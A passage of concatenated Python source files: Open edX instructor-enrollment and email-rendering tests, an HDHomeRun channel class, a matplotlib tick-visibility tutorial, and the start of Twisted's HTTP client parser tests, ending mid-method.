from django.utils.translation import get_language
from django.utils.translation import override as override_language
from nose.plugins.attrib import attr
from ccx_keys.locator import CCXLocator
from student.tests.factories import UserFactory
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory
from lms.djangoapps.ccx.tests.factories import CcxFactory
from student.models import CourseEnrollment, CourseEnrollmentAllowed
from student.roles import CourseCcxCoachRole
from student.tests.factories import (
AdminFactory
)
from instructor.enrollment import (
EmailEnrollmentState,
enroll_email,
get_email_params,
reset_student_attempts,
send_beta_role_email,
unenroll_email,
render_message_to_string,
)
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from submissions import api as sub_api
from student.models import anonymous_id_for_user
from xmodule.modulestore.tests.django_utils import SharedModuleStoreTestCase, TEST_DATA_SPLIT_MODULESTORE
@attr('shard_1')
class TestSettableEnrollmentState(TestCase):
""" Test the basis class for enrollment tests. """
def setUp(self):
super(TestSettableEnrollmentState, self).setUp()
self.course_key = SlashSeparatedCourseKey('Robot', 'fAKE', 'C-%-se-%-ID')
def test_mes_create(self):
"""
Test SettableEnrollmentState creation of user.
"""
mes = SettableEnrollmentState(
user=True,
enrollment=True,
allowed=False,
auto_enroll=False
)
# enrollment objects
eobjs = mes.create_user(self.course_key)
ees = EmailEnrollmentState(self.course_key, eobjs.email)
self.assertEqual(mes, ees)
class TestEnrollmentChangeBase(TestCase):
"""
Test instructor enrollment administration against database effects.
Test methods in derived classes follow a strict format.
`action` is a function which is run
the test will pass if `action` mutates state from `before_ideal` to `after_ideal`
"""
__metaclass__ = ABCMeta
def setUp(self):
super(TestEnrollmentChangeBase, self).setUp()
self.course_key = SlashSeparatedCourseKey('Robot', 'fAKE', 'C-%-se-%-ID')
def _run_state_change_test(self, before_ideal, after_ideal, action):
"""
Runs a state change test.
`before_ideal` and `after_ideal` are SettableEnrollmentState's
`action` is a function which will be run in the middle.
`action` should transition the world from before_ideal to after_ideal
`action` will be supplied the following arguments (None-able arguments)
`email` is an email string
"""
# initialize & check before
print "checking initialization..."
eobjs = before_ideal.create_user(self.course_key)
before = EmailEnrollmentState(self.course_key, eobjs.email)
self.assertEqual(before, before_ideal)
# do action
print "running action..."
action(eobjs.email)
# check after
print "checking effects..."
after = EmailEnrollmentState(self.course_key, eobjs.email)
self.assertEqual(after, after_ideal)
@attr('shard_1')
class TestInstructorEnrollDB(TestEnrollmentChangeBase):
""" Test instructor.enrollment.enroll_email """
def test_enroll(self):
before_ideal = SettableEnrollmentState(
user=True,
enrollment=False,
allowed=False,
auto_enroll=False
)
after_ideal = SettableEnrollmentState(
user=True,
enrollment=True,
allowed=False,
auto_enroll=False
)
action = lambda email: enroll_email(self.course_key, email)
return self._run_state_change_test(before_ideal, after_ideal, action)
def test_enroll_again(self):
before_ideal = SettableEnrollmentState(
user=True,
enrollment=True,
allowed=False,
auto_enroll=False,
)
after_ideal = SettableEnrollmentState(
user=True,
enrollment=True,
allowed=False,
auto_enroll=False,
)
action = lambda email: enroll_email(self.course_key, email)
return self._run_state_change_test(before_ideal, after_ideal, action)
def test_enroll_nouser(self):
before_ideal = SettableEnrollmentState(
user=False,
enrollment=False,
allowed=False,
auto_enroll=False,
)
after_ideal = SettableEnrollmentState(
user=False,
enrollment=False,
allowed=True,
auto_enroll=False,
)
action = lambda email: enroll_email(self.course_key, email)
return self._run_state_change_test(before_ideal, after_ideal, action)
def test_enroll_nouser_again(self):
before_ideal = SettableEnrollmentState(
user=False,
enrollment=False,
allowed=True,
auto_enroll=False
)
after_ideal = SettableEnrollmentState(
user=False,
enrollment=False,
allowed=True,
auto_enroll=False,
)
action = lambda email: enroll_email(self.course_key, email)
return self._run_state_change_test(before_ideal, after_ideal, action)
def test_enroll_nouser_autoenroll(self):
before_ideal = SettableEnrollmentState(
user=False,
enrollment=False,
allowed=False,
auto_enroll=False,
)
after_ideal = SettableEnrollmentState(
user=False,
enrollment=False,
allowed=True,
auto_enroll=True,
)
action = lambda email: enroll_email(self.course_key, email, auto_enroll=True)
return self._run_state_change_test(before_ideal, after_ideal, action)
def test_enroll_nouser_change_autoenroll(self):
before_ideal = SettableEnrollmentState(
user=False,
enrollment=False,
allowed=True,
auto_enroll=True,
)
after_ideal = SettableEnrollmentState(
user=False,
enrollment=False,
allowed=True,
auto_enroll=False,
)
action = lambda email: enroll_email(self.course_key, email, auto_enroll=False)
return self._run_state_change_test(before_ideal, after_ideal, action)
@attr('shard_1')
class TestInstructorUnenrollDB(TestEnrollmentChangeBase):
""" Test instructor.enrollment.unenroll_email """
def test_unenroll(self):
before_ideal = SettableEnrollmentState(
user=True,
enrollment=True,
allowed=False,
auto_enroll=False
)
after_ideal = SettableEnrollmentState(
user=True,
enrollment=False,
allowed=False,
auto_enroll=False
)
action = lambda email: unenroll_email(self.course_key, email)
return self._run_state_change_test(before_ideal, after_ideal, action)
def test_unenroll_notenrolled(self):
before_ideal = SettableEnrollmentState(
user=True,
enrollment=False,
allowed=False,
auto_enroll=False
)
after_ideal = SettableEnrollmentState(
user=True,
enrollment=False,
allowed=False,
auto_enroll=False
)
action = lambda email: unenroll_email(self.course_key, email)
return self._run_state_change_test(before_ideal, after_ideal, action)
def test_unenroll_disallow(self):
before_ideal = SettableEnrollmentState(
user=False,
enrollment=False,
allowed=True,
auto_enroll=True
)
after_ideal = SettableEnrollmentState(
user=False,
enrollment=False,
allowed=False,
auto_enroll=False
)
action = lambda email: unenroll_email(self.course_key, email)
return self._run_state_change_test(before_ideal, after_ideal, action)
def test_unenroll_norecord(self):
before_ideal = SettableEnrollmentState(
user=False,
enrollment=False,
allowed=False,
auto_enroll=False
)
after_ideal = SettableEnrollmentState(
user=False,
enrollment=False,
allowed=False,
auto_enroll=False
)
action = lambda email: unenroll_email(self.course_key, email)
return self._run_state_change_test(before_ideal, after_ideal, action)
@attr('shard_1')
class TestInstructorEnrollmentStudentModule(SharedModuleStoreTestCase):
""" Test student module manipulations. """
@classmethod
def setUpClass(cls):
super(TestInstructorEnrollmentStudentModule, cls).setUpClass()
cls.course = CourseFactory(
name='fake',
org='course',
run='id',
)
# pylint: disable=no-member
cls.course_key = cls.course.location.course_key
with cls.store.bulk_operations(cls.course.id, emit_signals=False):
cls.parent = ItemFactory(
category="library_content",
parent=cls.course,
publish_item=True,
)
cls.child = ItemFactory(
category="html",
parent=cls.parent,
publish_item=True,
)
cls.unrelated = ItemFactory(
category="html",
parent=cls.course,
publish_item=True,
)
def setUp(self):
super(TestInstructorEnrollmentStudentModule, self).setUp()
self.user = UserFactory()
parent_state = json.dumps({'attempts': 32, 'otherstuff': 'alsorobots'})
child_state = json.dumps({'attempts': 10, 'whatever': 'things'})
unrelated_state = json.dumps({'attempts': 12, 'brains': 'zombie'})
StudentModule.objects.create(
student=self.user,
course_id=self.course_key,
module_state_key=self.parent.location,
state=parent_state,
)
StudentModule.objects.create(
student=self.user,
course_id=self.course_key,
module_state_key=self.child.location,
state=child_state,
)
StudentModule.objects.create(
student=self.user,
course_id=self.course_key,
module_state_key=self.unrelated.location,
state=unrelated_state,
)
def test_reset_student_attempts(self):
msk = self.course_key.make_usage_key('dummy', 'module')
original_state = json.dumps({'attempts': 32, 'otherstuff': 'alsorobots'})
StudentModule.objects.create(
student=self.user,
course_id=self.course_key,
module_state_key=msk,
state=original_state
)
# lambda to reload the module state from the database
module = lambda: StudentModule.objects.get(student=self.user, course_id=self.course_key, module_state_key=msk)
self.assertEqual(json.loads(module().state)['attempts'], 32)
reset_student_attempts(self.course_key, self.user, msk, requesting_user=self.user)
self.assertEqual(json.loads(module().state)['attempts'], 0)
def test_delete_student_attempts(self):
msk = self.course_key.make_usage_key('dummy', 'module')
original_state = json.dumps({'attempts': 32, 'otherstuff': 'alsorobots'})
StudentModule.objects.create(
student=self.user,
course_id=self.course_key,
module_state_key=msk,
state=original_state
)
self.assertEqual(
StudentModule.objects.filter(
student=self.user,
course_id=self.course_key,
module_state_key=msk
).count(), 1)
reset_student_attempts(self.course_key, self.user, msk, requesting_user=self.user, delete_module=True)
self.assertEqual(
StudentModule.objects.filter(
student=self.user,
course_id=self.course_key,
module_state_key=msk
).count(), 0)
# Disable the score change signal to prevent other components from being
# pulled into tests.
@mock.patch('courseware.module_render.SCORE_CHANGED.send')
def test_delete_submission_scores(self, _lti_mock):
user = UserFactory()
problem_location = self.course_key.make_usage_key('dummy', 'module')
# Create a student module for the user
StudentModule.objects.create(
student=user,
course_id=self.course_key,
module_state_key=problem_location,
state=json.dumps({})
)
# Create a submission and score for the student using the submissions API
student_item = {
'student_id': anonymous_id_for_user(user, self.course_key),
'course_id': self.course_key.to_deprecated_string(),
'item_id': problem_location.to_deprecated_string(),
'item_type': 'openassessment'
}
submission = sub_api.create_submission(student_item, 'test answer')
sub_api.set_score(submission['uuid'], 1, 2)
# Delete student state using the instructor dash
reset_student_attempts(
self.course_key, user, problem_location,
requesting_user=user,
delete_module=True,
)
# Verify that the student's scores have been reset in the submissions API
score = sub_api.get_score(student_item)
self.assertIs(score, None)
def get_state(self, location):
"""Reload and grab the module state from the database"""
return StudentModule.objects.get(
student=self.user, course_id=self.course_key, module_state_key=location
).state
def test_reset_student_attempts_children(self):
parent_state = json.loads(self.get_state(self.parent.location))
self.assertEqual(parent_state['attempts'], 32)
self.assertEqual(parent_state['otherstuff'], 'alsorobots')
child_state = json.loads(self.get_state(self.child.location))
self.assertEqual(child_state['attempts'], 10)
self.assertEqual(child_state['whatever'], 'things')
unrelated_state = json.loads(self.get_state(self.unrelated.location))
self.assertEqual(unrelated_state['attempts'], 12)
self.assertEqual(unrelated_state['brains'], 'zombie')
reset_student_attempts(self.course_key, self.user, self.parent.location, requesting_user=self.user)
parent_state = json.loads(self.get_state(self.parent.location))
self.assertEqual(json.loads(self.get_state(self.parent.location))['attempts'], 0)
self.assertEqual(parent_state['otherstuff'], 'alsorobots')
child_state = json.loads(self.get_state(self.child.location))
self.assertEqual(child_state['attempts'], 0)
self.assertEqual(child_state['whatever'], 'things')
unrelated_state = json.loads(self.get_state(self.unrelated.location))
self.assertEqual(unrelated_state['attempts'], 12)
self.assertEqual(unrelated_state['brains'], 'zombie')
def test_delete_submission_scores_attempts_children(self):
parent_state = json.loads(self.get_state(self.parent.location))
self.assertEqual(parent_state['attempts'], 32)
self.assertEqual(parent_state['otherstuff'], 'alsorobots')
child_state = json.loads(self.get_state(self.child.location))
self.assertEqual(child_state['attempts'], 10)
self.assertEqual(child_state['whatever'], 'things')
unrelated_state = json.loads(self.get_state(self.unrelated.location))
self.assertEqual(unrelated_state['attempts'], 12)
self.assertEqual(unrelated_state['brains'], 'zombie')
reset_student_attempts(
self.course_key,
self.user,
self.parent.location,
requesting_user=self.user,
delete_module=True,
)
self.assertRaises(StudentModule.DoesNotExist, self.get_state, self.parent.location)
self.assertRaises(StudentModule.DoesNotExist, self.get_state, self.child.location)
unrelated_state = json.loads(self.get_state(self.unrelated.location))
self.assertEqual(unrelated_state['attempts'], 12)
self.assertEqual(unrelated_state['brains'], 'zombie')
class EnrollmentObjects(object):
"""
Container for enrollment objects.
`email` - student email
`user` - student User object
`cenr` - CourseEnrollment object
`cea` - CourseEnrollmentAllowed object
Any of the objects except email can be None.
"""
def __init__(self, email, user, cenr, cea):
self.email = email
self.user = user
self.cenr = cenr
self.cea = cea
class SettableEnrollmentState(EmailEnrollmentState):
"""
Settable enrollment state.
Used for testing state changes.
SettableEnrollmentState can be constructed and then
a call to create_user will make objects which
correspond to the state represented in the SettableEnrollmentState.
"""
def __init__(self, user=False, enrollment=False, allowed=False, auto_enroll=False): # pylint: disable=super-init-not-called
self.user = user
self.enrollment = enrollment
self.allowed = allowed
self.auto_enroll = auto_enroll
def __eq__(self, other):
return self.to_dict() == other.to_dict()
def __ne__(self, other):
return not self == other
def create_user(self, course_id=None):
"""
Utility method to possibly create and possibly enroll a user.
Creates a state matching the SettableEnrollmentState properties.
Returns a tuple of (
email,
User, (optionally None)
CourseEnrollment, (optionally None)
CourseEnrollmentAllowed, (optionally None)
)
"""
# if self.user=False, then this will just be used to generate an email.
email = "robot_no_user_exists_with_this_email@edx.org"
if self.user:
user = UserFactory()
email = user.email
if self.enrollment:
cenr = CourseEnrollment.enroll(user, course_id)
return EnrollmentObjects(email, user, cenr, None)
else:
return EnrollmentObjects(email, user, None, None)
elif self.allowed:
cea = CourseEnrollmentAllowed.objects.create(
email=email,
course_id=course_id,
auto_enroll=self.auto_enroll,
)
return EnrollmentObjects(email, None, None, cea)
else:
return EnrollmentObjects(email, None, None, None)
@attr('shard_1')
class TestSendBetaRoleEmail(TestCase):
"""
Test edge cases for `send_beta_role_email`
"""
def setUp(self):
super(TestSendBetaRoleEmail, self).setUp()
self.user = UserFactory.create()
self.email_params = {'course': 'Robot Super Course'}
def test_bad_action(self):
bad_action = 'beta_tester'
error_msg = "Unexpected action received '{}' - expected 'add' or 'remove'".format(bad_action)
with self.assertRaisesRegexp(ValueError, error_msg):
send_beta_role_email(bad_action, self.user, self.email_params)
@attr('shard_1')
class TestGetEmailParamsCCX(SharedModuleStoreTestCase):
"""
Test what URLs the function get_email_params returns for CCX student enrollment.
"""
MODULESTORE = TEST_DATA_SPLIT_MODULESTORE
@classmethod
def setUpClass(cls):
super(TestGetEmailParamsCCX, cls).setUpClass()
cls.course = CourseFactory.create()
@patch.dict('django.conf.settings.FEATURES', {'CUSTOM_COURSES_EDX': True})
def setUp(self):
super(TestGetEmailParamsCCX, self).setUp()
self.coach = AdminFactory.create()
role = CourseCcxCoachRole(self.course.id)
role.add_users(self.coach)
self.ccx = CcxFactory(course_id=self.course.id, coach=self.coach)
self.course_key = CCXLocator.from_course_locator(self.course.id, self.ccx.id)
# Explicitly construct what we expect the course URLs to be
site = settings.SITE_NAME
self.course_url = u'https://{}/courses/{}/'.format(
site,
self.course_key
)
self.course_about_url = self.course_url + 'about'
self.registration_url = u'https://{}/register'.format(site)
@patch.dict('django.conf.settings.FEATURES', {'CUSTOM_COURSES_EDX': True})
def test_ccx_enrollment_email_params(self):
# For a CCX, what do we expect to get for the URLs?
# Also make sure `auto_enroll` is properly passed through.
result = get_email_params(
self.course,
True,
course_key=self.course_key,
display_name=self.ccx.display_name
)
self.assertEqual(result['display_name'], self.ccx.display_name)
self.assertEqual(result['auto_enroll'], True)
self.assertEqual(result['course_about_url'], self.course_about_url)
self.assertEqual(result['registration_url'], self.registration_url)
self.assertEqual(result['course_url'], self.course_url)
@attr('shard_1')
class TestGetEmailParams(SharedModuleStoreTestCase):
"""
Test what URLs the function get_email_params returns under different
production-like conditions.
"""
@classmethod
def setUpClass(cls):
super(TestGetEmailParams, cls).setUpClass()
cls.course = CourseFactory.create()
# Explicitly construct what we expect the course URLs to be
site = settings.SITE_NAME
cls.course_url = u'https://{}/courses/{}/'.format(
site,
cls.course.id.to_deprecated_string()
)
cls.course_about_url = cls.course_url + 'about'
cls.registration_url = u'https://{}/register'.format(site)
def setUp(self):
super(TestGetEmailParams, self).setUp()
def test_normal_params(self):
# For a normal site, what do we expect to get for the URLs?
# Also make sure `auto_enroll` is properly passed through.
result = get_email_params(self.course, False)
self.assertEqual(result['auto_enroll'], False)
self.assertEqual(result['course_about_url'], self.course_about_url)
self.assertEqual(result['registration_url'], self.registration_url)
self.assertEqual(result['course_url'], self.course_url)
def test_marketing_params(self):
# For a site with a marketing front end, what do we expect to get for the URLs?
# Also make sure `auto_enroll` is properly passed through.
with mock.patch.dict('django.conf.settings.FEATURES', {'ENABLE_MKTG_SITE': True}):
result = get_email_params(self.course, True)
self.assertEqual(result['auto_enroll'], True)
# We should *not* get a course about url (LMS doesn't know what the marketing site URLs are)
self.assertEqual(result['course_about_url'], None)
self.assertEqual(result['registration_url'], self.registration_url)
self.assertEqual(result['course_url'], self.course_url)
@attr('shard_1')
class TestRenderMessageToString(SharedModuleStoreTestCase):
"""
Test that email templates can be rendered in a language chosen manually.
Test CCX enrollment email.
"""
MODULESTORE = TEST_DATA_SPLIT_MODULESTORE
@classmethod
def setUpClass(cls):
super(TestRenderMessageToString, cls).setUpClass()
cls.course = CourseFactory.create()
cls.subject_template = 'emails/enroll_email_allowedsubject.txt'
cls.message_template = 'emails/enroll_email_allowedmessage.txt'
@patch.dict('django.conf.settings.FEATURES', {'CUSTOM_COURSES_EDX': True})
def setUp(self):
super(TestRenderMessageToString, self).setUp()
coach = AdminFactory.create()
role = CourseCcxCoachRole(self.course.id)
role.add_users(coach)
self.ccx = CcxFactory(course_id=self.course.id, coach=coach)
self.course_key = CCXLocator.from_course_locator(self.course.id, self.ccx.id)
def get_email_params(self):
"""
Returns a dictionary of parameters used to render an email.
"""
email_params = get_email_params(self.course, True)
email_params["email_address"] = "user@example.com"
email_params["full_name"] = "Jean Reno"
return email_params
def get_email_params_ccx(self):
"""
Returns a dictionary of parameters used to render an email for CCX.
"""
email_params = get_email_params(
self.course,
True,
course_key=self.course_key,
display_name=self.ccx.display_name
)
email_params["email_address"] = "user@example.com"
email_params["full_name"] = "Jean Reno"
return email_params
def get_subject_and_message(self, language):
"""
Returns the subject and message rendered in the specified language.
"""
return render_message_to_string(
self.subject_template,
self.message_template,
self.get_email_params(),
language=language
)
def get_subject_and_message_ccx(self, subject_template, message_template):
"""
Returns the subject and message rendered in the specified language for CCX.
"""
return render_message_to_string(
subject_template,
message_template,
self.get_email_params_ccx()
)
def test_subject_and_message_translation(self):
subject, message = self.get_subject_and_message('fr')
language_after_rendering = get_language()
you_have_been_invited_in_french = u"Vous avez été invité"
self.assertIn(you_have_been_invited_in_french, subject)
self.assertIn(you_have_been_invited_in_french, message)
self.assertEqual(settings.LANGUAGE_CODE, language_after_rendering)
def test_platform_language_is_used_for_logged_in_user(self):
with override_language('zh_CN'): # simulate a user login
subject, message = self.get_subject_and_message(None)
self.assertIn("You have been", subject)
self.assertIn("You have been", message)
@patch.dict('django.conf.settings.FEATURES', {'CUSTOM_COURSES_EDX': True})
def test_render_enrollment_message_ccx_members(self):
"""
Test enrollment email template renders for CCX.
For EDX members.
"""
subject_template = 'emails/enroll_email_enrolledsubject.txt'
message_template = 'emails/enroll_email_enrolledmessage.txt'
subject, message = self.get_subject_and_message_ccx(subject_template, message_template)
self.assertIn(self.ccx.display_name, subject)
self.assertIn(self.ccx.display_name, message)
site = settings.SITE_NAME
course_url = u'https://{}/courses/{}/'.format(
site,
self.course_key
)
self.assertIn(course_url, message)
@patch.dict('django.conf.settings.FEATURES', {'CUSTOM_COURSES_EDX': True})
def test_render_unenrollment_message_ccx_members(self):
"""
Test unenrollment email template renders for CCX.
For EDX members.
"""
subject_template = 'emails/unenroll_email_subject.txt'
message_template = 'emails/unenroll_email_enrolledmessage.txt'
subject, message = self.get_subject_and_message_ccx(subject_template, message_template)
self.assertIn(self.ccx.display_name, subject)
self.assertIn(self.ccx.display_name, message)
@patch.dict('django.conf.settings.FEATURES', {'CUSTOM_COURSES_EDX': True})
def test_render_enrollment_message_ccx_non_members(self):
"""
Test enrollment email template renders for CCX.
For non EDX members.
"""
subject_template = 'emails/enroll_email_allowedsubject.txt'
message_template = 'emails/enroll_email_allowedmessage.txt'
subject, message = self.get_subject_and_message_ccx(subject_template, message_template)
self.assertIn(self.ccx.display_name, subject)
self.assertIn(self.ccx.display_name, message)
site = settings.SITE_NAME
registration_url = u'https://{}/register'.format(site)
self.assertIn(registration_url, message)
@patch.dict('django.conf.settings.FEATURES', {'CUSTOM_COURSES_EDX': True})
def test_render_unenrollment_message_ccx_non_members(self):
"""
Test unenrollment email template renders for CCX.
For non EDX members.
"""
subject_template = 'emails/unenroll_email_subject.txt'
message_template = 'emails/unenroll_email_allowedmessage.txt'
subject, message = self.get_subject_and_message_ccx(subject_template, message_template)
self.assertIn(self.ccx.display_name, subject)
self.assertIn(self.ccx.display_name, message)
|
astrilchuk/sd2xmltv | refs/heads/master | libhdhomerun/common/channel.py | 1 |
class Channel(object):
def __init__(self):
self.guide_number = None # type: unicode
self.guide_name = None # type: unicode
self.url = None # type: unicode
self.is_hd = False # type: bool
self.is_favorite = False # type: bool
def __unicode__(self): # type: () -> unicode
return "{0.guide_number} {0.guide_name}".format(self)
def __str__(self):
return unicode(self).encode("utf-8")
@classmethod
def from_dict(cls, dct): # type: (dict) -> Channel
channel = cls()
if "GuideNumber" in dct:
channel.guide_number = dct.pop("GuideNumber")
if "GuideName" in dct:
channel.guide_name = dct.pop("GuideName")
if "URL" in dct:
channel.url = dct.pop("URL")
if "HD" in dct:
if dct.pop("HD") == 1:
channel.is_hd = True
if "Favorite" in dct:
if dct.pop("Favorite") == 1:
channel.is_favorite = True
return channel
|
wangwei7175878/tutorials | refs/heads/master | matplotlibTUT/plt9_tick_visibility.py | 3 | # View more python tutorials on my Youtube and Youku channel!!!
# Youtube video tutorial: https://www.youtube.com/channel/UCdyjiB5H8Pu7aDTNVXTTpcg
# Youku video tutorial: http://i.youku.com/pythontutorial
# 9 - tick_visibility
"""
Please note, this script is for python3+.
If you are using python2+, please modify it accordingly.
Tutorial reference:
http://www.scipy-lectures.org/intro/matplotlib/matplotlib.html
"""
import matplotlib.pyplot as plt
import numpy as np
x = np.linspace(-3, 3, 50)
y = 0.1*x
plt.figure()
plt.plot(x, y, linewidth=10)
plt.ylim(-2, 2)
ax = plt.gca()
ax.spines['right'].set_color('none')
ax.spines['top'].set_color('none')
ax.xaxis.set_ticks_position('bottom')
ax.spines['bottom'].set_position(('data', 0))
ax.yaxis.set_ticks_position('left')
ax.spines['left'].set_position(('data', 0))
for label in ax.get_xticklabels() + ax.get_yticklabels():
label.set_fontsize(12)
label.set_bbox(dict(facecolor='white', edgecolor='None', alpha=0.7))
plt.show()
|
rockyzhang/zhangyanhit-python-for-android-mips | refs/heads/master | python-modules/twisted/twisted/web/test/test_newclient.py | 49 | # Copyright (c) 2009-2010 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.web._newclient}.
"""
__metaclass__ = type
from zope.interface import implements
from zope.interface.verify import verifyObject
from twisted.python import log
from twisted.python.failure import Failure
from twisted.internet.interfaces import IConsumer, IPushProducer
from twisted.internet.error import ConnectionDone
from twisted.internet.defer import Deferred, succeed, fail
from twisted.internet.protocol import Protocol
from twisted.trial.unittest import TestCase
from twisted.test.proto_helpers import StringTransport, AccumulatingProtocol
from twisted.web._newclient import UNKNOWN_LENGTH, STATUS, HEADER, BODY, DONE
from twisted.web._newclient import Request, Response, HTTPParser, HTTPClientParser
from twisted.web._newclient import BadResponseVersion, ParseError, HTTP11ClientProtocol
from twisted.web._newclient import ChunkedEncoder, RequestGenerationFailed
from twisted.web._newclient import RequestTransmissionFailed, ResponseFailed
from twisted.web._newclient import WrongBodyLength, RequestNotSent
from twisted.web._newclient import ConnectionAborted
from twisted.web._newclient import BadHeaders, ResponseDone, PotentialDataLoss, ExcessWrite
from twisted.web._newclient import TransportProxyProducer, LengthEnforcingConsumer, makeStatefulDispatcher
from twisted.web.http_headers import Headers
from twisted.web.http import _DataLoss
from twisted.web.iweb import IBodyProducer
class ArbitraryException(Exception):
"""
A unique, arbitrary exception type which L{twisted.web._newclient} knows
nothing about.
"""
class AnotherArbitraryException(Exception):
"""
Similar to L{ArbitraryException} but with a different identity.
"""
# A re-usable Headers instance for tests which don't really care what headers
# they're sending.
_boringHeaders = Headers({'host': ['example.com']})
def assertWrapperExceptionTypes(self, deferred, mainType, reasonTypes):
"""
Assert that the given L{Deferred} fails with the exception given by
C{mainType} and that the exceptions wrapped by the instance of C{mainType}
it fails with match the list of exception types given by C{reasonTypes}.
This is a helper for testing failures of exceptions which subclass
L{_newclient._WrapperException}.
@param self: A L{TestCase} instance which will be used to make the
assertions.
@param deferred: The L{Deferred} which is expected to fail with
C{mainType}.
@param mainType: A L{_newclient._WrapperException} subclass which will be
trapped on C{deferred}.
@param reasonTypes: A sequence of exception types which will be trapped on
the resulting L{mainType} exception instance's C{reasons} sequence.
@return: A L{Deferred} which fires with the C{mainType} instance
C{deferred} fails with, or which fails somehow.
"""
def cbFailed(err):
for reason, type in zip(err.reasons, reasonTypes):
reason.trap(type)
self.assertEqual(len(err.reasons), len(reasonTypes),
"len(%s) != len(%s)" % (err.reasons, reasonTypes))
return err
d = self.assertFailure(deferred, mainType)
d.addCallback(cbFailed)
return d
def assertResponseFailed(self, deferred, reasonTypes):
"""
A simple helper to invoke L{assertWrapperExceptionTypes} with a C{mainType}
of L{ResponseFailed}.
"""
return assertWrapperExceptionTypes(self, deferred, ResponseFailed, reasonTypes)
def assertRequestGenerationFailed(self, deferred, reasonTypes):
"""
A simple helper to invoke L{assertWrapperExceptionTypes} with a C{mainType}
of L{RequestGenerationFailed}.
"""
return assertWrapperExceptionTypes(self, deferred, RequestGenerationFailed, reasonTypes)
def assertRequestTransmissionFailed(self, deferred, reasonTypes):
"""
A simple helper to invoke L{assertWrapperExceptionTypes} with a C{mainType}
of L{RequestTransmissionFailed}.
"""
return assertWrapperExceptionTypes(self, deferred, RequestTransmissionFailed, reasonTypes)
def justTransportResponse(transport):
"""
Helper function for creating a Response which uses the given transport.
All of the other parameters to L{Response.__init__} are filled with
arbitrary values. Only use this method if you don't care about any of
them.
"""
return Response(('HTTP', 1, 1), 200, 'OK', _boringHeaders, transport)
class MakeStatefulDispatcherTests(TestCase):
"""
Tests for L{makeStatefulDispatcher}.
"""
def test_functionCalledByState(self):
"""
A method defined with L{makeStatefulDispatcher} invokes a second
method based on the current state of the object.
"""
class Foo:
_state = 'A'
def bar(self):
pass
bar = makeStatefulDispatcher('quux', bar)
def _quux_A(self):
return 'a'
def _quux_B(self):
return 'b'
stateful = Foo()
self.assertEqual(stateful.bar(), 'a')
stateful._state = 'B'
self.assertEqual(stateful.bar(), 'b')
stateful._state = 'C'
self.assertRaises(RuntimeError, stateful.bar)
class HTTPParserTests(TestCase):
"""
Tests for L{HTTPParser} which is responsible for the bulk of the task of
parsing HTTP bytes.
"""
def test_statusCallback(self):
"""
L{HTTPParser} calls its C{statusReceived} method when it receives a
status line.
"""
status = []
protocol = HTTPParser()
protocol.statusReceived = status.append
protocol.makeConnection(StringTransport())
self.assertEqual(protocol.state, STATUS)
protocol.dataReceived('HTTP/1.1 200 OK\r\n')
self.assertEqual(status, ['HTTP/1.1 200 OK'])
self.assertEqual(protocol.state, HEADER)
def _headerTestSetup(self):
header = {}
protocol = HTTPParser()
protocol.headerReceived = header.__setitem__
protocol.makeConnection(StringTransport())
protocol.dataReceived('HTTP/1.1 200 OK\r\n')
return header, protocol
def test_headerCallback(self):
"""
L{HTTPParser} calls its C{headerReceived} method when it receives a
header.
"""
header, protocol = self._headerTestSetup()
protocol.dataReceived('X-Foo:bar\r\n')
# Cannot tell it's not a continue header until the next line arrives
# and is not a continuation
protocol.dataReceived('\r\n')
self.assertEqual(header, {'X-Foo': 'bar'})
self.assertEqual(protocol.state, BODY)
def test_continuedHeaderCallback(self):
"""
If a header is split over multiple lines, L{HTTPParser} calls
C{headerReceived} with the entire value once it is received.
"""
header, protocol = self._headerTestSetup()
protocol.dataReceived('X-Foo: bar\r\n')
protocol.dataReceived(' baz\r\n')
protocol.dataReceived('\tquux\r\n')
protocol.dataReceived('\r\n')
self.assertEqual(header, {'X-Foo': 'bar baz\tquux'})
self.assertEqual(protocol.state, BODY)
def test_fieldContentWhitespace(self):
"""
Leading and trailing linear whitespace is stripped from the header
value passed to the C{headerReceived} callback.
"""
header, protocol = self._headerTestSetup()
value = ' \t \r\n bar \t\r\n \t\r\n'
protocol.dataReceived('X-Bar:' + value)
protocol.dataReceived('X-Foo:' + value)
protocol.dataReceived('\r\n')
self.assertEqual(header, {'X-Foo': 'bar',
'X-Bar': 'bar'})
def test_allHeadersCallback(self):
"""
After the last header is received, L{HTTPParser} calls
C{allHeadersReceived}.
"""
called = []
header, protocol = self._headerTestSetup()
def allHeadersReceived():
called.append(protocol.state)
protocol.state = STATUS
protocol.allHeadersReceived = allHeadersReceived
protocol.dataReceived('\r\n')
self.assertEqual(called, [HEADER])
self.assertEqual(protocol.state, STATUS)
def test_noHeaderCallback(self):
"""
If there are no headers in the message, L{HTTPParser} does not call
C{headerReceived}.
"""
header, protocol = self._headerTestSetup()
protocol.dataReceived('\r\n')
self.assertEqual(header, {})
self.assertEqual(protocol.state, BODY)
def test_headersSavedOnResponse(self):
"""
All headers received by L{HTTPParser} are added to
L{HTTPParser.headers}.
"""
protocol = HTTPParser()
protocol.makeConnection(StringTransport())
protocol.dataReceived('HTTP/1.1 200 OK\r\n')
protocol.dataReceived('X-Foo: bar\r\n')
protocol.dataReceived('X-Foo: baz\r\n')
protocol.dataReceived('\r\n')
self.assertEqual(
list(protocol.headers.getAllRawHeaders()),
[('X-Foo', ['bar', 'baz'])])
def test_connectionControlHeaders(self):
"""
L{HTTPParser.isConnectionControlHeader} returns C{True} for headers
which are always connection control headers (similar to "hop-by-hop"
headers from RFC 2616 section 13.5.1) and C{False} for other headers.
"""
protocol = HTTPParser()
connHeaderNames = [
'content-length', 'connection', 'keep-alive', 'te', 'trailers',
'transfer-encoding', 'upgrade', 'proxy-connection']
for header in connHeaderNames:
self.assertTrue(
protocol.isConnectionControlHeader(header),
"Expecting %r to be a connection control header, but "
"wasn't" % (header,))
self.assertFalse(
protocol.isConnectionControlHeader("date"),
"Expecting the arbitrarily selected 'date' header to not be "
"a connection control header, but was.")
def test_switchToBodyMode(self):
"""
L{HTTPParser.switchToBodyMode} raises L{RuntimeError} if called more
than once.
"""
protocol = HTTPParser()
protocol.makeConnection(StringTransport())
protocol.switchToBodyMode(object())
self.assertRaises(RuntimeError, protocol.switchToBodyMode, object())
class HTTPClientParserTests(TestCase):
"""
Tests for L{HTTPClientParser} which is responsible for parsing HTTP
response messages.
"""
def test_parseVersion(self):
"""
L{HTTPClientParser.parseVersion} parses a status line into its three
components.
"""
